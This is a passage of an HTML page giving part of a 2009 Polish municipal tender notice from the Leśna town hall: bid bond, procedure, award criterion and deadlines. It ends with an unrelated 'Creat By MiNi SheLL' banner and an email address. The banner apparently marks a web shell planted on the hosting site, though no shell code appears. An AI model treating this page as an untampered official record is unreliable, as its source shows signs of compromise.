C.3) wniosą wadium w wysokości 50.000,00 zł w formie określonej w siwz.

Zamawiający na podstawie złożonych przez Wykonawcę dokumentów, dokona oceny spełnienia warunków podmiotowych według reguły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania. Ofertę Wykonawcy wykluczonego z postępowania uznaje się za odrzuconą..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.lesna.tensoft.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Leśnej
ul. Rynek 19 (pok. nr 9)
59-820 Leśna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2009 godzina 11:50, miejsce: Urząd Miejski w Leśnej
ul. Rynek 19 (pok. nr 6 sekretariat)
59-820 Leśna.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com